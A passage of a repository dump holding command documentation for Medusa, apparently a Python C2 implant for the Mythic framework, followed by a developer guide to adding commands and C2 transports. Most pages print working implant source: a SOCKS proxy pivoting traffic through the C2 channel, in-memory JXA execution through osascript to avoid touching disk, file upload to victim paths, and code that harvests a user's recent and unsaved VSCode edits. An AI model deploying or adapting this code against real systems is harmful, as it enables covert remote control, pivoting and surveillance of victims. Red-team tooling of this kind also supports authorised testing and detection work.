    if len(t_socks) > 0: return \"[!] SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if activeCount() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"A2M:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"M2A:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = 
task[\"completed\"] = True\n                self.socks_open = {}\n\n```\n\nPython 3.8:\n\n```Python\n    def socks(self, task_id, action, port):\n        import socket, select, queue\n        from threading import Thread, activeCount\n        from struct import pack, unpack\n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data).decode(), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return sock\n\n        def connect_to_dst(dst_addr, dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE.encode())\n                except PermissionError as err: return 0\n            try:\n                sock.connect((dst_addr, dst_port))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = message[:BUFSIZE]\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == 
ATYP_IPV4:\n                dst_addr = socket.inet_ntoa(s5_request[4:-2])\n                dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for 
sock in reader:\n                        data = sock.recv(BUFSIZE)\n                        if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return                \n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n            if len(t_socks) > 0: return \"[!] 
SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if activeCount() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = queue.Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"a2m:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"m2a:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = task[\"completed\"] = True\n               
 self.socks_open = {}\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/spawn_jxa.md",
    "content": "+++\ntitle = \"spawn_jxa\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis spawns a new instance of `osascript` and uses the subprocess library to pipe uploaded AppleScript/JXA script content to it, preventing the need to drop any script to disk.  \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### file\n\n- Description: script file to load into agent\n- Required Value: True  \n- Default Value: None  \n\n#### language\n\n- Description: language of script to execute\n- Required Value: True  \n- Default Value: JavaScript  \n\n## Usage\n\n```\nspawn_jxa\n```\n\n## Detailed Summary\n\nThe script is downloaded and executed by piping content to the stdin of the newly spawned `osascript` process.\n\n```Python\n    def spawn_jxa(self, task_id, file, language):\n        import os\n        import subprocess\n        \n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: \n            args = []\n            if language == \"JavaScript\":\n                args = [\"osascript\", \"-l\", \"JavaScript\", \"-\"]\n            elif language == \"AppleScript\":\n                args = [\"osascript\", \"-\"]\n\n            osapipe = 
subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, \n                stderr=subprocess.PIPE)\n\n            osapipe.stdin.write(cmd_code.encode())\n            stdout, stderr = osapipe.communicate()\n            out = stderr if stderr else stdout\n            return str(out)\n        else: return \"Failed to load script\"\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/unload.md",
    "content": "+++\ntitle = \"unload\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUnload an existing capability from the agent. \n     \n- Python Versions Supported: 2.7, 3.8     \n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### function\n\n- Description: function to unload\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nunload function\n```\n\n## Detailed Summary\nNote that this will only unload the function from the instantiation of the Medusa agent class, it won't remove it from any on-disk script that was executed. So consider using this in a `load` then `unload` scenario.\n\n```Python\n    def unload(self, task_id, command):\n        delattr(medusa, command)\n        cmd_list = [{\"action\": \"remove\", \"cmd\": command}]\n        responses = [{ \"task_id\": task_id, \"user_output\": \"Unloaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n        message = { \"action\": \"post_response\", \"responses\": responses }\n        response_data = self.postMessageAndRetrieveResponse(message)\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/unload_module.md",
    "content": "+++\ntitle = \"unload_module\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUnloads a module that is currently loaded in-memory.\n\n>**NOTE** If the module has already been imported in a custom script, it will remain importable in subsequent scripts.\n\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### module_name\n\n- Description: the name of the module to unload, e.g. 'dns'\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nunload_module module_name\n```\n\n## Detailed Summary\n\nThis function removes the custom finder added to the `meta_path`. It also removes the zip file from the agent dictionary:\n\n```Python\n    def unload_module(self, task_id, module_name):\n        if module_name in self._meta_cache:\n            finder = self._meta_cache.pop(module_name)\n            sys.meta_path.remove(finder)\n            self.moduleRepo.pop(module_name)\n            return \"{} module unloaded\".format(module_name)\n        else: return \"{} not found in loaded modules\".format(module_name)\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/upload.md",
    "content": "+++\ntitle = \"upload\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUpload a file to the target machine by selecting a file from your computer. \n     \n- Python Versions Supported: 2.7, 3.8     \n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### file\n\n- Description: file to upload   \n- Required Value: True  \n- Default Value: None  \n\n#### remote_path\n\n- Description: /remote/path/on/victim.txt  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nupload\n```\n\n## MITRE ATT&CK Mapping\n\n- T1132  \n- T1030  \n- T1105  \n\n## Detailed Summary\nThis function uses API calls to chunk and transfer a file down from Mythic to the agent, then uses API calls to write the file out to disk:\n\n```Python\n    def upload(self, task_id, file, remote_path):\n        total_chunks = 1\n        chunk_num = 0\n        with open(remote_path, \"wb\") as f:\n            while (chunk_num < total_chunks):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                data = { \n                    \"action\": \"post_response\",\n                    \"responses\": [\n                        {\n                            \"upload\": {\n                                \"chunk_size\": CHUNK_SIZE,\n                                \"file_id\": file, \n                                \"chunk_num\": chunk_num,\n                                \"full_path\": remote_path\n                            },\n                            \"task_id\": task_id\n                        }\n                    ] \n                }\n                response = self.postMessageAndRetrieveResponse(data)\n                chunk = response[\"responses\"][0]\n                chunk_num+=1\n                total_chunks = chunk[\"total_chunks\"]\n                
f.write(base64.b64decode(chunk[\"chunk_data\"]))\n\n```\nAfter successfully writing the file to disk, the agent will report back the final full path so that it can be tracked within the UI.\n"
  },
  {
    "path": "documentation-payload/medusa/commands/vscode_list_recent.md",
    "content": "+++\ntitle = \"vscode_list_recent\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the Python `sqlite3` library to query VSCode state databases and return the contents.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nvscode_list_recent [state_db]\n```\n\n## Detailed Summary\nMedusa uses the `sqlite3` library to query the contents of the local user's VSCode state database. The list of recently opened files and folders is then queried in this database, and the results are formatted by a browser script in the UI.\n\n```Python\n    def vscode_list_recent(self, task_id, db=\"\"):\n        import os, sqlite3, json\n        \n        path = db if db else \"/Users/{}/Library/Application Support/Code/User/globalStorage/state.vscdb\".format(os.environ[\"USER\"])\n        recent_files = []\n\n        if not os.path.exists(path):\n            return \"VSCode State database path does not exist!\"\n\n        with sqlite3.connect(path) as con:\n            for row in con.execute('SELECT * FROM \"ItemTable\" WHERE KEY = \"history.recentlyOpenedPathsList\"'):\n                data = json.loads(row[1])\n                for entry in data[\"entries\"]:\n                    recent_file = {}\n                    if \"folderUri\" in entry:\n                        recent_file[\"path\"] = entry[\"folderUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"folder\"\n                    elif \"fileUri\" in entry:\n                        recent_file[\"path\"] = entry[\"fileUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"file\"\n                    recent_files.append(recent_file)\n        return { \"recents\": recent_files }\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/vscode_open_edits.md",
    "content": "+++\ntitle = \"vscode_open_edits\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis recurses the VSCode Backups directory and reads each file found to discern which files have been opened in VSCode and not yet saved (or are entirely new and unsaved files).\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nvscode_open_edits [backup_dir_path]\n```\n\n## Detailed Summary\nThis recurses a given VSCode Backups directory - by default, `/Library/Application Support/Code/Backups` - and reads each file. Details of which file is being edited as well as some metadata is extracted and returned to Mythic, where it's rendered by a browser script for the UI.\n\n```Python\n    def vscode_open_edits(self, task_id, backups_path=\"\"):\n        import os, json\n        import time\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.exists(path):\n            return \"VSCode backups folder does not exist!\"\n\n        open_edits = []\n        for root, dirs, files in os.walk(path):\n            for file in files:\n                if file != \".DS_Store\" and file != \"workspaces.json\":\n                    open_edit = {}\n                    path = os.path.join(root, file)\n                    with open(path, \"r\") as f:\n                        file_content = f.readlines()\n                        json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip())\n                        if os.path.basename(root) == \"untitled\":\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").rstrip()\n                            open_edit[\"size\"] = \"\"\n                            open_edit[\"mtime\"] = \"\"\n                            
open_edit[\"ctime\"] = \"\"\n                            open_edit[\"type\"] = \"New\"\n                        else:\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"file://\",\"\").rstrip()\n                            open_edit[\"size\"] = f\"{json_data['size']} B\"\n                            open_edit[\"mtime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                            open_edit[\"ctime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"ctime\"]/1000))\n                            open_edit[\"type\"] = \"Edit\"\n                    open_edits.append(open_edit)\n        return { \"edits\" : open_edits }\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/vscode_watch_edits.md",
    "content": "+++\ntitle = \"vscode_watch_edits\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nContinuously poll a VSCode backups directory and report any unsaved edits.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### backups path\n\n- Description: VSCode backups folder to monitor\n- Required Value: False  \n- Default Value: ~/Library/Application Support/Code/Backups  \n\n#### polling frequency\n\n- Description: interval in seconds to wait between polling for changes\n- Required Value: True  \n- Default Value: None  \n\n\n## Usage\n\n```\nvscode_watch_edits [path to remote dir] [poll_interval]\n```\n\n\n## Detailed Summary\n\n```Python\n    def vscode_watch_edits(self, task_id, backups_path=\"\", seconds=1):\n        import hashlib, time, os, json\n\n        known_files = {}\n\n        def getOriginalFileDetails(path):\n            with open(path, \"r\") as f:\n                file_content = f.readlines()\n                json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip()) \n                return (\n                    file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").replace(\"file://\",\"\").rstrip(),\n                    json_data[\"size\"],\n                    time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                )\n\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    
file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue \n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New File: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) - Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] File Updated: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) - Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, 
file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    \n                    known_files[full_file_path] = hash\n            \n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n            \n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} Deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.isdir(path):\n            return \"[!] Path must be a valid directory\"\n        elif not os.access(path, os.R_OK):\n            return \"[!] 
Path not accessible\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(path, False) \n            while(True):\n                if not os.path.exists(path):\n                    return  \"[!] Root directory has been deleted.\"\n                diffFolder(path)\n                time.sleep(seconds)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/watch_dir.md",
    "content": "+++\ntitle = \"watch_dir\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nContinuously poll a directory and report any changes, e.g. new files, deletions, etc.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path\n\n- Description: folder to monitor\n- Required Value: True  \n- Default Value: None  \n\n#### polling frequency\n\n- Description: interval in seconds to wait between polling for changes\n- Required Value: True  \n- Default Value: None  \n\n\n## Usage\n\n```\nwatch_dir {path to remote dir} poll_interval\n```\n\n\n## Detailed Summary\n\n```Python\n    def watch_dir(self, task_id, path, seconds):\n        import hashlib\n        known_files = {}\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue\n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"[*] New File: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n      
              elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"[*] File Updated: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    known_files[full_file_path] = hash\n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id, 
\"[*] {} deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n    \n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n\n        if not os.path.isdir(file_path):\n            return \"[!] Path must be a valid directory\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(file_path, False) \n            while(True):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n                if not os.path.exists(file_path):\n                    return \"[!] Root directory has been deleted.\"\n                diffFolder(file_path)\n                time.sleep(seconds)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/development.md",
    "content": "+++\ntitle = \"Development\"\nchapter = false\nweight = 20\npre = \"<b>3. </b>\"\n+++\n\n## Adding Commands\n\nCommands are located in `Payload_Type/medusa/medusa/agent_code/`. Notably, there are three file extensions you might encounter. A given command can be included solely as a `.py`, if it could be used in a Python 2.7 or 3.8 script with no modification. Where changes are required, be that due to syntax, libraries, etc. a `.py2` and/or `.py3` file is used. These are looked up at payload build-time to ensure the correct function code is included.\n\nIn addition to the `.py*` files above, the function definitions found in `Payload_Type/medusa/medusa/mythic/agent_functions/` include an attribute that specifies which versions of Python a given function is compatible with (as well as which OSs). Using the `download` function as an example:\n\n```Python\nclass DownloadCommand(CommandBase):\n    cmd = \"download\"\n    ...\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n```\n\nHere we can see that the download function is supported by all OSs and both versions of Python.\n\nWhen it comes to dynamic function loading, this `supported_python_versions` attribute is used by the `load` command to ensure only compatible functions are presented in the UI for loading into a live agent (see below).\n\n```Python\nasync def get_commands(self, callback: dict) -> [str]:\n\tresp = await MythicRPC().execute(\"get_callback_commands\", callback_id=callback[\"id\"])\n\treturn [ cmd[\"cmd\"] for cmd in resp.response if callback[\"build_parameters\"][\"python_version\"] in cmd[\"attributes\"][\"supported_python_versions\"]]\n\n```\n\nAll commands follow the general format below (where `command_name` is the name of the command you'd type in the UI):\n\n```Python\n    def command_name(self, task_id, 
input):\n\t\tdoThing(input)\n\t\treturn \"output for mythic\"\n\n```\n \nIt's worth noting that the `task_id` argument is always passed in to a function. This allows any function to look up its own task in the Medusa agent's `self.taskings` variable. Amongst other things, this allows it to check if it's been set to a 'stopped' state by the main thread and should therefore cease execution.\n\nSimilarly, as all functions are read and concatenated at build-time, we need to respect tabulation to ensure the resulting Python script actually runs. As a result, every function is 4-spaces indented.\n\n\n### Available Components within Commands\n\nInside of commands, you get access to certain extra functions and information that's part of the agent overall.\n\nFirstly, as mentioned above, we have the `task_id` value. When implementing long-running functions using while-loops for example, we can include a check to make sure we're good to keep going. This can be implemented as below:\n\n```Python\n\tdef long_running_task(self, task_id):\n\t\twhile True:\n\t\t\tif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n\t\t\t# do some cool stuff\n```\n\nSimilarly, where our function has mid-execution output to stream back to Mythic, there is an included `sendTaskOutputUpdate()` function which can be used to send updates. 
It's worth noting that this function is _currently_ not tied into the main thread responses, and will send data back to Mythic immediately upon execution.\n\nThis function can be executed within a function as below:\n\n```Python\n\tdef streamed_output(self, task_id):\n\t\t# Send output back to Mythic\n\t\tself.sendTaskOutputUpdate(task_id, \"We're running\")\n\t\ttime.sleep(1)\n\t\tself.sendTaskOutputUpdate(task_id, \"We slept a little\")\n\t\ttime.sleep(10000)\n\t\tself.sendTaskOutputUpdate(task_id, \"what year is it?!?\")\n```\n\n\n## Modifying base agent behavior\n\nThe base agent templates can be found at `Payload_Type/medusa/medusa/agent_code/base_agent/`. Just as with functions, there are `.py2` and `.py3` files included for the two supported Python versions.\n\nMedusa supports use of either the non-default `cryptography` library (installed on macOS, but not ubiquitous elsewhere) or a manual crypto implementation using built-in libraries for its encrypted communications. For this reason, within the `base_agent/` directory, you'll see a pair of `crypto_lib` python files and a pair of `manual_crypto` files. 
As you can probably guess, this allows an agent to pick an encryption method across either supported Python version.\n\nThe agent construction now uses a **core + transport** model:\n\n- `base_agent_core.py2` / `base_agent_core.py3` contain shared runtime logic (task loop, task processing, response handling, sleep/killdate, etc.).\n- `transport_http.py2` / `transport_http.py3` contain HTTP-specific networking and config snippets.\n- `transport_azure_blob.py2` / `transport_azure_blob.py3` contain Azure Blob-specific networking and config snippets.\n\nDuring build, the payload builder stitches these together by replacing section markers in the core template (`TRANSPORT_IMPORTS`, `TRANSPORT_CLASS_FIELDS`, `TRANSPORT_FUNCTIONS`, `TRANSPORT_CONFIG`) with content from the selected transport template.\n\nIf you modify shared behavior, update `base_agent_core.py2` and `base_agent_core.py3`. If you modify transport behavior, update the corresponding `transport_*.py2` and `transport_*.py3` files.\n\n## Adding C2 Profiles\n\nMedusa currently supports both `http` and `azure_blob` C2 profiles.\n\nFor new transports, add a matching pair of template files:\n\n- `transport_<name>.py2`\n- `transport_<name>.py3`\n\nwith the required sections:\n\n- `### IMPORTS ###`\n- `### CLASS_FIELDS ###`\n- `### FUNCTIONS ###`\n- `### CONFIG ###`\n\nThen add the profile name to the payload builder's supported `c2_profiles` list."
  },
  {
    "path": "documentation-payload/medusa/opsec.md",
